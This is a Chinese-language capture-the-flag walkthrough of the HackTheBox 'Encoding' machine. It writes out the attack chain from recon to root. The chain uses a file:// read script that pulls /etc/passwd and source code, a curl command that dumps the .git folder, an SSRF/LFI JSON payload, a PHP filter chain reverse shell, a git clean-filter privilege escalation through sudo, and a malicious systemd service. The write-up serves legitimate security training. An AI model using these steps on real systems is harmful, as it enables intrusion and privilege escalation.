靶场笔记-HTB Encoding

Encoding

一、常规端口扫描

开放了22和80端口

二、web渗透

• 访问web的api页面发现了一个子域名，先留着备用

  

• 对其进行目录扫描，没发现有用的信息

  sudo feroxbuster -u http://haxtables.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
  

  

• 指定文件扫描，发现handler.php可访问

  

• 子域名爆破，发现了api和403的image子域名

  wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://haxtables.htb -H "Host:FUZZ.haxtables.htb" --hw 137
  

  

• 继续查看API页面，发现给了很多转换编码的代码示例，其中找到了一个"file_url"参数，这就可以试试file协议了，但是这个脚本返回的是一个编码后的数据，想要得到原始数据还需要进行解码

  

  

• 改善后的py脚本内容如下：

  import requests
  import json
  
  json_data = {
  	'action': 'str2hex',
          'file_url' : 'file:///etc/passwd'
  }
  
  response = requests.post('http://api.haxtables.htb/v3/tools/string/index.php', json=json_data)
  data = json.loads(response.text)
  hex_string = data["data"]
  bytes_object = bytes.fromhex(hex_string)
  string = bytes_object.decode()
  print(string)
  

  运行后成功拿到/etc/passwd数据

  

• 能利用file协议读取文件，那就先读取一下刚才扫描到的image子域的源码，因为是Apache所以位置为：/var/www/image/index.php

  

  发现image/index.php包含了utils.php，继续读取这个utils源码看看，内容如下

  ┌──(kali㉿kali)-[~/wallthrough/encoding]
  └─$ sudo python hax.py
  <?php
  
  // Global functions
  
  function jsonify($body, $code = null)
  {
      if ($code) {
          http_response_code($code);
      }
  
      header('Content-Type: application/json; charset=utf-8');
      echo json_encode($body);
  
      exit;
  }
  
  function get_url_content($url)
  {
      $domain = parse_url($url, PHP_URL_HOST);
      if (gethostbyname($domain) === "127.0.0.1") {
          echo jsonify(["message" => "Unacceptable URL"]);
      }
  
      $ch = curl_init();
      curl_setopt($ch, CURLOPT_URL, $url);
      curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTP);
      curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTPS);
      curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,2);
      curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
      $url_content =  curl_exec($ch);
      curl_close($ch);
      return $url_content;
  
  }
  
  function git_status()
  {
      $status = shell_exec('cd /var/www/image && /usr/bin/git status');
      return $status;
  }
  
  function git_log($file)
  {
      $log = shell_exec('cd /var/www/image && /ust/bin/git log --oneline "' . addslashes($file) . '"');
      return $log;
  }
  
  function git_commit()
  {
      $commit = shell_exec('sudo -u svc /var/www/image/scripts/git-commit.sh');
      return $commit;
  }
  ?>
  

  观察到这个php使用了git工具，那就意味着这个文件夹下大概率存在.git文件夹，于是修改脚本进行测试，位置为/var/www/image/.git/config’

  

  结果显示确实存在.git文件夹

• 使用gittools中的gitdump.sh进行下载这个目录的文件分析，但是下载时都出错了

  脚本地址：GitTools/gitdumper.sh at master · internetwache/GitTools · GitHub

  

  这里忽略了这个脚本的下载方式要改一下，因为是image是403，所以还要以file协议的方式进行下载，修改代码如下，在download file位置修改：

  curl -X POST -H 'Content-Type: application/json' --data-binary "{\"action\": \"str2hex\", \"file_url\": \"file:///var/www/image/.git/$objname\"}" 'http://api.haxtables.htb/v3/tools/string/index.php' | jq .data | xxd -r -p > "$target"
  

  

• 把.git文件夹下载到本地后，可以使用git ls-files --stage查看文件列表

  

  git cat-file -p查看一下文件内容，看到多出一个action_handler.php,这个文件主要作用是判断是否存在get page参数

  

• 这个文件名为action_handler.php,想到刚才扫描中也有个handler.php文件，于是下载源码也分析一波，这段代码主要是用来判断是否存在’action’,‘data_file’和’uri_path’参数的，如果json格式的参数为空或者不存在则返回’Insufficient parameters!’，如果存在则调用make_api_call函数，猜测这个函数应该是向api发送请求的。重点来了，这段代码完全没对json参数进行过滤，也就意味着存在LFI漏洞，我们可以传入uri_path的恶意参数进行SSRF攻击

  <?php
  include_once '../api/utils.php';
  
  if (isset($_FILES['data_file'])) {
      $is_file = true;
      $action = $_POST['action'];
      $uri_path = $_POST['uri_path'];
      $data = $_FILES['data_file']['tmp_name'];
  
  } else {
      $is_file = false;
      $jsondata = json_decode(file_get_contents('php://input'), true);
      $action = $jsondata['action'];
      $data = $jsondata['data'];
      $uri_path = $jsondata['uri_path'];
  
  
  
      if ( empty($jsondata) || !array_key_exists('action', $jsondata) || !array_key_exists('uri_path', $jsondata)) 
      {
          echo jsonify(['message' => 'Insufficient parameters!']);
          // echo jsonify(['message' => file_get_contents('php://input')]);
  
      }
  
  }
  
  $response = make_api_call($action, $data, $uri_path, $is_file);
  echo $response;
  
  ?>
  
  

• 为了方便，直接使用burpsuite进行改包操作，json参数为：

  {
  	"action": "str2hex",
  	"data":"asdafaf", 
  	"uri_path": "abc@image.haxtables.htb/actions/action_handler.php?page=/etc/passwd&"
  }
  

  返回成功

  

• 根据之前的操作说明这个参数我们完全可控，那么就可以尝试利用PHP filters chain技术获取shell

  地址：GitHub - synacktiv/php_filter_chain_generator

  先生成利用链

  

  通过burp传参，要注意参数格式为/&a=生成的revshell&

  

• 成功拿到shell，找到立足点

  

三、提权至用户

• 常规执行sudo -l命令，发现可以执行/var/www/image/scripts/git-commit.sh，通过这个可以尝试提权到svc账户

  

• 进入/var/www/image/scripts/，查看git-commit.sh发现这是一个用来管理Git仓库文件的脚本

  #!/bin/bash
  
  u=$(/usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image ls-fi
  les  -o --exclude-standard)
  
  if [[ $u ]]; then
          /usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image a
  dd -A
  else
          /usr/bin/git --git-dir=/var/www/image/.git  --work-tree=/var/www/image c
  ommit -m "Commited from API!" --author="james <james@haxtables.htb>"  --no-verif
  y
  fi
  
  

• 经过一番分析，可以用以下命令来反弹一个具有用户权限的shell，因为一般tmp目录都具有写入权限，所以把执行反弹shell的脚本放在tmp目录下

  git init
  echo '*.php filter=indent' > .git/info/attributes
  git config filter.indent.clean /tmp/shell.sh
  sudo -u svc /var/www/image/scripts/git-commit.sh
  

• 执行上面的命令成功得到一个shell

  

• 成功获取第一个flag

  

四、提权至root

• 得到用户权限的shell后，还是常规查看一下sudo -l，发现了可以以root权限重启系统服务

  

• 自己先新建一个系统服务，内容如下，这里就直接用刚才反弹用户shell的那个脚本反弹一次root权限的shell：

  echo '[Service]
  Type=oneshot
  ExecStart=/tmp/shell.sh
  [Install]
  WantedBy=multi-user.target' > /etc/systemd/system/root1.service
  

  然后运行：

  sudo systemctl restart root1
  

  成功获取root权限的shell

  

• 获取rootflag